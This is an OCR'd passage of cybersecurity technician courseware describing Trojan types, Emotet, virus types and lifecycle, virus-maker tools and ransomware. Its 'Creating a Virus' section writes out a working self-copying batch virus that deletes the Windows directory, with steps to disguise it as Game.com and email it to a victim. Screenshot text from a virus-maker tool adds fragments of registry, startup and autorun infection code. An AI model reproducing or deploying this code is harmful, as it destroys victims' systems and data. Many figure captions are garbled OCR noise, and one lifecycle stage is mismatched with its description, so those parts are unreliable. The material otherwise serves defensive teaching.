send it to the attacker's command-and-control center. Installation of these Trojans takes place on the victim’s computer when he or she clicks a malicious email attachment or a malicious advertisement. Attackers program these Trojans to steal minimum and maximum monetary amounts, so that they do not withdraw all the money in the account, thereby avoiding suspicion. Point-of-Sale Trojans: As the name indicates, point-of-sale (POS) Trojans are a type of financial fraudulent malware that target POS and payment equipment such as credit card/debit card readers. Attackers use POS Trojans to compromise such POS equipment and grab sensitive information regarding credit cards, such as credit card number, holder name, and CVV number. Defacement Trojans: Defacement Trojans, once spread over the system, can destroy or change the entire content of a database. However, they are more dangerous when attackers target websites, as they physically change the underlying HTML format, resulting in the modification of content. In addition, significant losses may be incurred due to the defacement of e-business targets by Trojans. Service Protocol Trojans: These Trojans can take advantage of vulnerable service protocols such as VNC, HTTP/HTTPS, and ICMP, to attack the victim’s machine. Mobile Trojans: Mobile Trojans are malicious software that target mobile phones. Mobile Trojan attacks are increasing rapidly due to the global proliferation of mobile phones. The attacker tricks the victim into installing the malicious application. When the victim downloads the malicious app, the Trojan performs various attacks such as banking credential stealing, social networking credential stealing, data encryption, and device locking. 10. loT Trojans: Internet of things (loT) refers to the inter-networking of physical devices, buildings, and other items embedded with electronics. IoT Trojans are malicious programs that attack loT networks. These Trojans leverage a botnet to attack other machines outside the loT network. 11. Security Software Disabler Trojans: Security software disabler Trojans stop the working of security programs such as firewalls, and IDS, either by disabling them or killing the processes. These are entry Trojans, which allow an attacker to perform the next level of attack on the target system. Module 01 Page 43 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 12. Destructive Trojans: The sole purpose of a destructive Trojan is to delete files on a target system. Antivirus software may not detect destructive Trojans. Once a destructive Trojan infects a computer system, it randomly deletes files, folders, and registry entries as well as local and network drives, often resulting in OS failure. 13. DDoS Attack Trojans: These Trojans are intended to perform DDoS attacks on target machines, networks, or web addresses. They make the victim a zombie that listens for commands sent from a DDoS Server on the Internet. There will be numerous infected systems standing by for a command from the server, and when the server sends the command to all or a group of the infected systems, since all the systems perform the command simultaneously, a considerable amount of legitimate requests flood the target and cause the service to stop responding. 14. Command Shell Trojans: A command shell Trojan provides remote control of a command shell on a victim’s machine. A Trojan server is installed on the victim's machine, which opens a port, allowing the attacker to connect. The client is installed on the attacker's machine, which is used to launch a command shell on the victim’s machine. Netcat, DNS Messenger, GCat are some of the latest command shell Trojans. Module 01 Page 44 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 Creating a Trojan ° Trojan Horse construction kits help attackers to construct Trojan horses of their choice @ The tools in these kits can be dangerous and can backfire if not properly executed Trojan Horse :. Theef RAT Trojan Construction Kits Theef is a Remote Access Trojan written in Delphi. It allows remote DarkHorse Trojan Virus Maker Trojan Horse Construction Kit Senna Spy Trojan Generator attackers access to the system via port Batch Trojan Generator 9871 Umbra Loader - Botnet Trojan Maker yright © by All Rights Reserved. Reproduction is Strictly Prohibited Creating a Trojan Attackers can create Trojans using various Trojan horse construction Trojan Virus Maker, and Senna Spy Trojan Generator. kits such as DarkHorse Trojan Horse Construction Kit Trojan horse construction kits help according to their needs. These tools New Trojans created by attackers scanning tools, as they do not match to succeed in launching attacks. = attackers construct Trojan horses and customize them are dangerous and can backfire if not properly executed. remain undetected when scanned by virus- or Trojanany known signatures. This added benefit allows attackers Theef RAT Trojan Theef is a Remote Access Trojan written in Delphi. It allows remote attackers access to the system via port 9871. Theef is a Windows-based application for both client and server. The Theef server is a virus that you install on a target computer, and the Theef client is what you then use to control the virus. Module 01 Page 45 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 Figure 1.3: Screenshot of Theef RAT Trojan Some additional Trojan horse construction kits are as follows: DarkHorse Trojan Virus Maker Trojan Horse Construction Kit Senna Spy Trojan Generator Batch Trojan Generator Umbra Loader - Botnet Trojan Maker Module 01 Page 46 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 Trojan Example: Emotet O Emotet is a banking Trojan which can function both as a Trojan by itself or as the downloader and dropper of other banking Trojans QO Itisa polymorphic malware as it can change its own identifiable features to evade signature-based detection Prom: CUAtomer Gewaylerva €1 (8 [Maito (ATomer Gemayieryaes (a) Monday Aped 16 [ Subject: Mecopt Confimaton 84119160V [UNSCANNED) ransaction Status: N L Shipped! Hi _ RTINS - 2018 11 0% AM 16 Aprfl I - Sent: » Yo b [Corvgtn, Vet Hnriack et m e - m W R T £l v.A- = - E-E =B Beem F BE ] NS e [T -9 s S— AaBb iyl AaBSG. Ae Smesre 11109120 ARSY A rre DT | Your transaction processed successfully It's an official confirmation for your order. Please check the invoice to update your stuff shipping day. Password to access Invoice:722 Thanks for using our service! ® L !(Pl wemt 2 7D Soaam wm hrps:/fwww fortinet.com Copyright © by E L. All Rights Reserved. Reproduction s Strictly Prohibited Trojan Example: Emotet Source: https://www.fortinet.com Emotet is a revolutionary malware that is designed with a modular architecture, where the main programs are installed first before the delivery of other payloads. It is also considered as a dropper, a downloader, and a Trojan by security analysts. It is a polymorphic malware, as it can change its own identifiable features when downloaded so that it can elude signature-based detection and other antivirus programs. Emotet is usually a banking Trojan that can function both as a Trojan by itself or as the downloader and dropper of other banking Trojans. It has been employed as a dropper/downloader for well-known banking Trojans such as Zeus Panda banker, Trickbot, and Iced ID to infect victims globally. Although it is a Trojan, Emotet has advanced persistence techniques and worm-like self-propagation abilities, which make it uniquely resilient as a destructive malware that could jeopardize individuals, companies, and government entities globally. Module 01 Page 47 Certified Cybersecurity Technician Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 From: customerGewayservicesca [maito customer@emayservices ca) Semt: Morday. 16. 2018 11 0% AN To: Subject: Recept Confirmation #417916MV [UNSCANNED) ransaction Status: Shipped! 16 April 11109121 ARSY It's an official confirmation for your order. Please check the invoice to update your stuff shipping day. eWayServices.ca! Password to access Invoice:722 Thanks for using our service! Figure 1.4: Spam email with malicious content distributing Emotet ‘@A 0l DV 57 ome B 7 Paste Clipboard PAYOSTISTA6167553 doc [Compatibility Mode] - Microsoft Word Mome | Intert 7% U Pagelayout o - ae AW x' x, Font References 3 M 4AF Mailings Review ECIER AW € -! 0 RE E Paragraph View O - Developer m o Format T e acsscr AaBbC AaBDG BookTitle Emphasis Headingl Heading2 0 Styles ® SR g;‘;::_‘ O m | @ Setect * Eciting been. | _ ] To open the document, follow these steps: This document is only available for desktop or laptop versions of Microsoft Office Word. Click Enable editing button from the yellow bar above - Once you have enabled editing, please click Enable content button from the yellow bar above Page:1ofd | Words0 | 5 | I [EEEEX Figure 1.5: Malicious Word document used for installing Emotet Module 01 Page 48 Certified Cybersecurity Technician Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 What is aVirus? QO Avirus is a self-replicating program that produces its own copy by attaching itself to another program, computer boot sector or document Q Viruses are generally transmitted through file downloads, infected disk/flash drives, and as email attachments Infect other programs = Characteristics of Viruses Transform themselves Encrypt themselves = Alter data = Corrupt files and programs = Self-replicate Copyright © by EC-Councll. All Rights Reserved. Reproduction is Strictly Prohibited Viruses What is a Virus? Viruses are the scourge of modern computing. Computer viruses have the potential to wreak havoc on both business and personal computers. The lifetime of a virus depends on its ability to reproduce itself. Therefore, attackers design every virus code such that the virus replicates itself n times. A computer virus is a self-replicating program that produces its code by attaching copies of itself to other executable code and operates without the knowledge or consent of the user. Like a biological virus, a computer virus is contagious and can contaminate other files; however, viruses can infect external machines only with the assistance of computer users. Virus reproduces its own code while enclosing other executables, and spreads throughout the computer. Viruses can spread the infection by damaging files in a file system. Some viruses reside in the memory and may infect programs through the boot sector. A virus can also be in an encrypted form. Some viruses affect computers as soon as their code is executed; other viruses remain dormant until a pre-determined logical circumstance is met. Viruses infect a variety of files, such as overlay files (.OVL) and executable files (.EXE,.SYS,.COM, or.BAT). They through file downloads, infected disk/flash drives, and email attachments. are transmitted A virus can only spread from one PC to another when its host program is transmitted to the uncorrupted computer. This can occur, for example, when a user transmits it over a network, or executes it on a removable media. Viruses are sometimes confused with worms, which are standalone programs that can spread to other computers without a host. A majority of PCs are now connected to the Internet and to local area networks, which aids in increasing their spread. Module 01 Page 49 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 Characteristics of Viruses The performance of a computer is affected by a virus infection. This infection can lead to data loss, system crash, and file corruption. Some of the characteristics of a virus are as follows: = Infects other programs = Transforms itself = Encrypts itself = Alters data = Corrupts files and programs = Replicates itself Module 01 Page 50 Certified Cybersecurity Technician Copyright © by EG-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 Purpose of CreatingViruses Inflict damage on competitors Realize financial benefits S Vandalize intellectual property & @ O © Q) @Q \flg\. \_/l I° Play pranks/Conduct. research Copyright © by EC-C Engage in cyber- terrorism e Damage networks or computers ® Gain remote access to a victim's computer I. All Rights Reserved. Reproduction is Strictly Prohibited Purpose of Creating Viruses Attackers create viruses with disreputable motives. Criminals create viruses to destroy a company’s data, as an act of vandalism, or to destroy a company’s products; however, in some cases, viruses aid the system. An attacker creates a virus for the following purposes: = Inflict damage on competitors = Realize financial benefits = Vandalize intellectual property = Play pranks * Conduct research = Engage in cyber-terrorism = Distribute political messages * Damage networks or computers = Gain remote access to a victim's computer Module 01 Page 51 Certified Cybersecurity Technician Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 Indications Processes require more resources and time, resultingin of Virus Attack () ] (5 degraded performance Computer beeps with no display. Drive label changes and 'C‘:it.li::; Computer freezes frequently or encounters an error such as BSOD ()2 03 © : o— @ o Constant antivirus alerts (06 Files and folders are missing (07 Suspicious hard drive activity Browser window “freezes” L All Rights Reserved. Reproduction is Strictly Prohibited Indications of Virus Attack Indications of virus attacks arise from abnormal activities. Such activities reflect the nature of a virus by interrupting the regular flow of a process or a program. However, not all bugs created contribute toward attacking the system; they may be merely false positives. For example, if the system runs slower than usual, one may assume that a virus has infected the system; however, the actual reason might be program overload. An effective virus tends to multiply rapidly and may infect some machines in a short period. Viruses can infect files on the system, and when such files are transferred, they can infect machines of other users who receive them. A virus can also use file servers to infect files. When a virus infects a computer, the victim or user will be able to identify some indications of the presence of virus infection. Some indications of computer virus infection are as follows: = Processes require more resources and time, resulting in degraded performance = Computer beeps with no display = Drive label changes and OS does not load = Constant antivirus alerts = Computer freezes frequently or encounters an error such as BSOD = Files and folders are missing = Suspicious hard drive activity = Browser window “freezes” Module 01 Page 52 Certified Cybersecurity Technician Copyright © by EG-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities = Lack of storage space * Unwanted advertisements and pop-up windows = Unable to open files in the system = Strange emails received Module 01 Page 53 Exam 212-82 Certified Cybersecurity Technician Copyright © by EG-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 Stages of Virus Lifecycle Virus replicates itself Users install antivirus for a period within the A virus is identified as target system and then spreadsitself a threatinfecting %% Rephcatlon Design Developing virus code using programming languages or construction kits the virus threats Execution of the Detection damage routine Incorporation Antivirus software It gets activated when the T updates and eliminate target system Launch 9 e user performs certain actions such as running infected programs developers assimilate defenses againstthe virus Copyright © by EC-(. All Rights Reserved. Reproduction is Strictly Prohibited Stages of Virus Lifecycle The virus lifecycle includes the following six stages from origin to elimination. 1. Design: Development of virus code using programming languages or construction kits. 2. Replication: The virus replicates for a period within the target system and then spreads itself. 3. Launch: The virus is activated when the user performs specific actions such as running an infected program. 4. Detection: The virus is identified as a threat infecting target system. 5. Incorporation: Antivirus software developers assimilate defenses against the virus. 6. Execution of the damage routine: Users install antivirus updates and eliminate the virus threats. Module 01 Page 54 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 How does a Computer Get Infected by Viruses? When a user accepts files and downloads without properly checkingthe source o Openinginfected e-mail attachments @ Not runningthe latest. antivirus application © Clicking malicious online ads Installing pirated Sl Not. Using portable media updatingand not instaul:ngneev versions of Connectingto untrusted networks plug-ins How does a Computer Get Infected by Viruses? To infect a system, first, a virus has to enter it. Once the user downloads and installs the virus from any source and in any form, it replicates itself to other programs. Then, the virus can infect the computer in various ways, some of which are listed below: * Downloads: Attackers incorporate viruses in popular software programs and upload them to websites intended for download. When a user unknowingly downloads this infected software and installs it, the system is infected. = Email attachments: Attackers usually send virus-infected files as email attachments to spread the virus on the victim’s system. When the victim opens the malicious attachment, the virus automatically infects the system. = Pirated software: Installing cracked versions of software (OS, Adobe, Microsoft Office, etc.) might infect the system as they may contain viruses. = Failing to install security software: With the increase in security parameters, attackers are designing new viruses. Failing to install the latest antivirus software or regularly update it may expose the computer system to virus attacks. = Updating software: If patches are not regularly installed when released by vendors, viruses might exploit vulnerabilities, thereby allowing an attacker to access the system. = Browser: By default, every browser comes with built-in security. An incorrectly configured browser could result in the automatic running of scripts, which may, in turn, allow viruses to enter the system. = Firewall: Disabling the firewall will compromise the security of network traffic and invite viruses to infect the system. Module 01 Page 55 Certified Cybersecurity Technician Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 = Pop-ups: When the user clicks any suspicious pop-up by mistake, the virus hidden behind the pop-up enters the system. Whenever the user turns on the system, the installed virus code will run in the background. = Removable media: When a healthy system is associated with virus-infected removable media (e.g., DVD, USB drive, card reader), the virus spreads the system. = Network access: Connecting to an untrusted Wi-Fi network, leaving Bluetooth ON, or permitting a file sharing program that is accessed openly will allow a virus to take over the device. = Backup and restore: Taking a backup of an infected file and restoring it to a system infects the system again with the same virus. = Malicious online ads: Attackers post malicious online ads by embedding malicious code in the ads, also known infected. = as malvertising. Once users click these ads, their computers get Social Media: People tend to click on social media sites, including malicious links shared by their contacts, which can infect their systems. Module 01 Page 56 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 Types of Viruses ° QO viruses are categories according to their functioning and targets O Some of the example includes: System or Boot Sector Virus Polymorphic Virus Web Scripting Virus File and Multipartite Virus Metamorphic Virus Email and Armored Virus Macro and Cluster Virus Overwriting File or Cavity Virus Add-on and Intrusive Virus Stealth/Tunneling Virus Companion/Camouflage Virus Direct Action or Transient Virus Encryption Virus Shell and File Extension Virus Terminate & Stay Resident Virus Sparse Infector Virus FAT and Logic Bomb Virus Copyright © by EC-Councll. All Rights Reserved. Reproduction is Strictly Prohibited.. Types of Viruses Viruses are categories according to their functioning and targets. Some of the most common types of computer viruses that adversely affect the security of systems are listed below: 1. System or Boot Sector Virus: The most common targets for a virus are the system sectors, which include the master boot record (MBR) and the DOS boot record system sectors. The primary carriers of system or boot sector viruses are email attachments and removable media (USB drives). A boot sector virus moves MBR to another location on the hard disk and copies itself to the original location of MBR. When the system boots, first, the virus code executes and then control passes to the original MBR. 2. File Virus: File viruses infect files executed or interpreted in the system, such as COM, EXE, SYS, OVL, OBJ, PRG, MNU, and BAT files. File viruses can be direct-action (non- resident) or memory-resident viruses. File viruses insert their code into the original file and infect executable files. Such viruses are numerous, albeit rare. They infect in a variety of ways and are found in numerous file types. 3. Multipartite Virus: A multipartite virus (also known as a multipart virus or hybrid virus) combines the approach of file infectors and boot record infectors and attempts to simultaneously attack both the boot sector and the executable or program files. When the virus infects the boot sector, it will, in turn, affect the system files and vice versa. This type of virus re-infects a system repeatedly if it is not rooted out entirely from the target Tequila. 4. machine. Some examples of multipartite viruses include Invader, Flip, and Macro Virus: Macro viruses infects Microsoft Word or similar applications by automatically performing a sequence of actions after triggering an application. Most Module 01 Page 57 Certified Cybersecurity Technician Copyright © by EG-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 macro viruses are written using the macro language Visual Basic for Applications (VBA), and they infect templates or convert infected documents into template files while maintaining their appearance of common document files. Cluster Virus: Cluster viruses infect files without changing the file or planting additional files. They save the virus code to the hard drive and overwrite the pointer in the directory entry, directing the disk read point to the virus code instead of the actual program. Even though the changes in the directory entry may affect all the programs, only one copy of the virus exists on the disk. Stealth/Tunneling Virus: These viruses try to hide from antivirus programs by actively altering and corrupting the service call interrupts while running. The virus code replaces the requests to perform operations with respect to these service call interrupts. These viruses state false information to hide their presence from antivirus programs. For example, a stealth virus hides the operations that it modified and gives false representations. Thus, it takes over portions of the target system and hides its virus code. Encryption Virus: Encryption viruses or cryptolocker viruses penetrate the target system via freeware, shareware, codecs, fake advertisements, torrents, email spam, and so on. This type of virus consists of an encrypted copy of the virus and a decryption module. The decryption module remains constant, whereas the encryption makes use of different keys. Sparse Infector Virus: antivirus programs. To spread infection, viruses typically attempt to hide from Sparse infector viruses infect less often and try to minimize their probability of discovery. These viruses infect only occasionally upon satisfying certain conditions or infect only those files whose lengths fall within a narrow range. Polymorphic Virus: Such viruses infect code already decoded by a decryption for each replication to avoid detection. module and the instruction sequence. generators in their implementation. a file with an encrypted copy of a polymorphic module. Polymorphic viruses modify their code They accomplish this by changing the encryption Polymorphic mechanisms use random number 10. Metamorphic Virus: Metamorphic viruses are programmed such that they rewrite themselves completely each time they infect a new executable file. Such viruses are sophisticated and use metamorphic engines for their execution. Metamorphic code reprograms itself. It is translated into temporary code (a new variant of the same virus but with different code) and then converted back into the original code. This technique, in which the original algorithm remains intact, is used to avoid pattern recognition by antivirus software. Metamorphic viruses are more effective than polymorphic viruses. 11. Overwriting File or Cavity Virus: Some programs have empty spaces in them. Cavity viruses, also known as space fillers, overwrite a part of the host file with a constant (usually nulls), without increasing the length of the file while preserving its functionality. Maintaining a constant file size when infecting allows the virus to avoid detection. Cavity viruses are rarely found due to the unavailability of hosts and code complexity. Module 01 Page 58 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities 12. Companion Exam 212-82 Virus/Camouflage Virus: The companion filename as the target program file. The virus infects file, and it modifies the hard disk data. Companion before the execution of EXE files. The virus installs an virus stores itself with the same the computer upon executing the viruses use DOS to run COM files identical COM file and infects EXE files. 13. Shell Virus: The shell virus code forms a shell around the target host program’s code, making itself the original program with the host code as its sub-routine. Nearly all boot program viruses are shell viruses. 14. File Extension Virus: File extension viruses change the extensions of files. The extension.TXT is safe as it indicates a pure text file. With extensions turned off, if someone sends you a file named BAD.TXT.VBS, you will only see BAD.TXT. If you have forgotten that extensions are turned off, you might think that this is a text file and open it. It actually is an executable Visual Basic Script virus file and could cause severe damage. 15. FAT Virus: A FAT virus is a computer virus that attacks the File Allocation Table (FAT), a system used in Microsoft products and some other types of computer systems to access the information stored on a computer. By attacking the FAT, a virus can cause severe damage to a computer. FAT viruses can work in a variety of ways. Some are designed to embed themselves into files so that when the FAT accesses the file, the virus is triggered. Others may attack the FAT directly. 16. Logic Bomb Virus: A logic bomb is a virus that is triggered by a response to an event, such as the launching of an application or when a specific date/time is reached, where it involves logic to execute the trigger. When a logic bomb is programmed to execute on a specific date, it is referred to as a time bomb. Time bombs are usually programmed to set off when important dates are reached, such as Christmas and Valentine’s Day. 17. Web Scripting Virus: A web scripting virus is a type of computer security vulnerability that breaches your web browser security through a website. This allows attackers to inject client-side scripting into the web page. It can bypass access controls and steal information from the web browser. Web scripting viruses are usually used to attack sites with large populations, such as sites for social networking, user reviews, and email. 18. Email Virus: An e-mail virus refers to computer code sent to you as an e-mail attachment, which if activated, will result in some unexpected and usually harmful effects, such as destroying specific files on your hard disk and causing the attachment to be emailed to everyone in your address book. Email viruses perform a wide variety of activities, from creating pop-ups to crashing systems or stealing personal data. 19. Armored Virus: Armored viruses are viruses that are designed to confuse or trick deployed antivirus systems to prevent them from detecting the actual source of the infection. These viruses make it difficult for antivirus programs to trace the actual source of the attack. They trick antivirus programs by showing some other location even though they are actually on the system itself. Module 01 Page 59 Certified Cybersecurity Technician Copyright © by EG-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 20. Add-on Virus: Add-on viruses append their code to the host code without making any changes to the latter or relocate the host code to insert their code at the beginning. 21. Intrusive Virus: Intrusive viruses overwrite the host code completely or partly with the viral code. 22. Direct Action or Transient Virus: Direct action or transient viruses transfer all controls of the host code to where it resides in the memory. It selects the target program to be modified and corrupts it. The life of a transient virus is directly proportional to the life of its host. Therefore, transient virus executes only upon the execution of its attached program and terminates upon the termination of its attached program. At the time of execution, the virus may spread to other programs. This virus is transient or direct, as it operates only for a short period and goes directly to the disk to search for programs to infect. 23. Terminate and Stay Resident Virus (TSR): A terminate and stay resident (TSR) virus remains permanently in the target machine’s memory during an entire work session, even after the target host’s program is executed and terminated. The TSR virus remains in memory and therefore has some control over the processes. Module 01 Page 60 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 Creating a Virus A virus can be created in two different ways: = Writing aVirus Program = UsingVixus Maker Tools Send the Game.com file as \ an email attachment to a 7~ ~ victim Writing a Virus in %%f (*.bat) del c:\Windows\*.* copy 3%f + Game.bat Ptogra.m.\ : @ rorrennianees o for A ‘ Game.bat with this text off ’ ’ Create a batch file @ echo é@!’& ]. do........... 9 H............... 9. £ v : Convert the Game.bat batch file to Game.com using the bat2com utility \ When run, it copies itself to ] all the.bat files in the current directory and deletes all the files in the Windows directory Creating a Virus (Cont’d) Virus Maker Tools DELmE’s Batch Virus Maker Bhavesh Virus Maker SKW Using Virus Maker Tools > Deadly Virus Maker SonicBat Batch Virus Maker TeraBIT Virus Maker Andreinick05's Batch Virus Maker Creating a Virus A virus can be created in two ways: writing a virus program, and using virus maker tools. = Writing a Simple Virus Program The following steps are involved in writing a simple virus program: 1. Create a batch file Game.bat with the following text: Module 01 Page 61 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 @ echo off for %%f in (*.bat) do copy %%f + Game.bat del c:\Windows\*.* Convert the Game.bat batch file into Game.com using the bat2com utility Send the Game.com file as an email attachment to the victim When Game.com is executed by the victim, it copies itself to all the.bat files in the current directory on the target machine and deletes all the files in the Windows directory = Using Virus Maker Tools Virus maker tools allow you to customize and craft your virus into a single executable file. The nature of the virus depends on the options available in the virus maker tool. Once the virus file is built and executed, it can perform the following tasks: (o] Disable Windows command prompt and Windows Task Manager o Shut down the system o] Infect all executable files Inject itself into the Windows registry and start up with Windows Perform non-malicious activity such as unusual mouse and keyboard actions Module 01 Page 62 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Exam 212-82 Information Security Threats and Vulnerabilities The following tools are useful for testing the security of your own antivirus software. o DELmE’s Batch Virus Maker DELmE’s Batch Virus Generator is a virus creation program with many options to infect the victim’s PC, such as formatting the C: drive, deleting all the files in the hard disk drive, disabling admin privileges, cleaning the registry, changing the home page, killing tasks, and disabling/removing the antivirus and firewall. [ DELmE's Batch Virus Maker v 2.0 [o] @ echo off Infection PayloadlomerOptions Local Infection %%E I (ABCDEFGHIJKLMNOPQRSTUVWXY.Z) Do ( [ Infect Reg Run Key | Infect All Drives [ ( infect Statup Folder | [ Infect Autoexecbat | [ 4 %E-\autorun inf — edvoad;on=0penfoldertosee“es >> %%E\autorun inf) — - Filetype Infection e oi ® Infect Al Exe Fles — — - Infect Al Folders Infect "Is” Cmd — = = | [ Infect Al Lk Files | [ Infect Al.Doc Files [ infect Al Tt Fles | [ Infect Al Pdi Fles | [ Infect Al Xml Fles | ( Infect Al Mp3Fies | [ Infect Al Mp4 Files | [ Infect Al Pg Fies | rem Infect All.Exe Files Infect Fietype pesoc exeebaifie DIR /S/B %SystemDrive%\" exe >> InfList_exe td =1.° delims AT 4 in (InfList_exe j echo YIFOR/F* Y| FO tokens=1." bdt) d do copy ¢ /yfy % %0 Enter File Bxdension To Infect (eg9 "bd).m [Cifect ] Infect | set reginf="hkim\Software\Microsoft\Windows\Current Version\Run" reg add %reginf% /v %valinf% A "REG_SZ" /d %0 A >nd e i Infect ——— rem Infect Startup Folder copy %0 "%usemprofie’\Stat Menu\Programs\Startup” o. B hzemet Soreadmg - e. y [ Infect | | nfect aaas) - | Infect e |tfect._ | Send To Contacts | Sends Virus To All Contacts On Microsoft Outiook O —weemreeeoeeeeene As An Email Attachment rem Infect All.Pdf Fies assoc pdf=batfie DIR /S/B %SystemDrive%\"pdf >> InflList_pdfba echo Y | FOR /F "tokens=1." deims=: " %.%j in (InfList_pdf bad) do copy /y %0"* - e " Virus Maker b Inf DELmE's Batch Virus Maker. Version: 2.0 7 — Virus Name Vi rus Athor Co nnect Fabinhoff - Trcjn View Agreement Start Over S Save As.Bat View Credis r J | Bxt Scripting Language: Autolt v3.3.0.0 Coded By: DELmE Coded for: Membersof HackForums Net To contact me vist HackForums. Net and send me a message Please view the User Agreement by clicking the "Agreement button™ and make ] ] | sure you fully understand and agree with the agreement Save As.Txt Figure 1.6: Screenshot of DELmE’s Batch Virus Maker Module 01 Page 63 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities o Exam 212-82 JPS Virus Maker JPS Virus Maker tool is used to create customized viruses. It has many in-built options to create a virus. Some of the features of this tool are auto-startup, disable task manager, Defender, etc. disable control panel, enable remote desktop, turn off Windows M3 JPS ( Virus Maker 4.0 ) Virus Options : Disable Registry Disable MsConfig Disable TaskManager Hide Hide Hide Hide Hide Hide Disable Telegram Disable Media Player Disable Internet Explorer Disable Time Services Windows Clock Desktop Icons Run Taskbar Cursor Swap Mouse Button Disable Windows Explorer Remove Folder Options Lock Mouse and Keyboard Disable Notepad Always Open CD_ROM Disable Wordpad Turn Off Monitor Disable Disable Disable Disable Disable Disable Crazy Mouse Disable Group Policy Windows System Restore Taskbar Start Button DHCP Client CMD Enable Remote Desktop Destroy Clipboard Lock Screen Mute Sound Remove Bluetooth Remove Windows Themes Slow Mouse Speed Turn Off Windows Firewall Turn Off Windows Defender Run In System Mode X | Disable Windows Update X | Disable Disable Disable Disable Disable Control Panel Desktop Icons Screen Saver. Browsers Drives Restart LogOff X TurnOff Name After Install ; & sbout | L Auto Startup Hibrinate (e ) None Server Name : Create Virus! | x86(328it) v Exit (D) Figure 1.7: Working of JPS Virus Maker Some additional virus maker tools are as follows: = Bhavesh Virus Maker SKW = Deadly Virus Maker = SonicBat Batch Virus Maker = = TeraBIT Virus Maker Andreinick05's Batch Virus Maker Module 01 Page 64 Certified Cybersecurity Technician Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 O Ransomware Atype of malware that restricts access to the computer system’s files and folders 0O Demands an online ransom payment to the malware creator(s) to remove the restrictions Files get encrypted and access is blocked demanding ransom = Attacker in e-mall ~ - Malware executes and gets installed Victim pays ransom to get access Attacker unlocks and provides access Copyright © by [ e Victim gets access to files All Rights Reserved. Reproduction ks Strictly Prohibited Ransomware (Cont’d) Ransomware T isa Al youw ransomware that Wrte thin 30 s the ke of your s attacks victims em: ~e Families All your files have been encrypted! dreadful through —— P Vou e have ! y 1 pay nire for Socrypton i il decrypt ol your flas the - et/ Becors. The prce depends on how 1352 you wite 1 Sodinokibi us. A paprment B B e chocrypion. T St s of fhet rut b hoematon, (dstatises backips, lrgn excel sheets, o ) : A wabecen ot b 40 W CTB-Locker we wll send you B decngton todl Bat BitPaymer St s g 10 the victims to contact the threat actors viaz a : provided email address and pay in itcoins for the ACIOTIA Cerber ot ta| restore Thews, write e i 10 the ee mad FC. Tfyous you ward Quaraniee s G ask vour e erarypied o otTR rerarme Uy 15 GySe your Gats LS s s I (1o s chund), nd fhes T o S T ks CrvptXXX Yp Cryptorbit ransomware o e e TWd Darty software, £ My Cause permarent dats bes veton of your fles Wit the help of B st B Crypto Locker Ransomware Crypto jarses My Cae Noreaned proe (Tey 301 Ter foe 1 Ransom - ma Dhar ) & you €an become 3 woam of & 5cam Defense Ransomware Notes Crypto Wall Ransomware Copyright © by EC- All Rights Reserved. Reproduction ks Strictly Prohibited Ransomware Ransomware is a type of malware that restricts access to the infected computer system or critical files and documents stored on it, and then demands an online ransom payment to the malware creator(s) to remove user restrictions. Ransomware is a type of crypto-malware that might encrypt files stored on the system’s hard disk or merely lock the system and display messages meant to trick the user into paying the ransom. Module 01 Page 65 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 Usually, ransomware spreads as a Trojan, entering a system through email attachments, hacked websites, infected programs, app downloads from untrusted sites, vulnerabilities in network services, and so on. After execution, the payload in the ransomware runs and 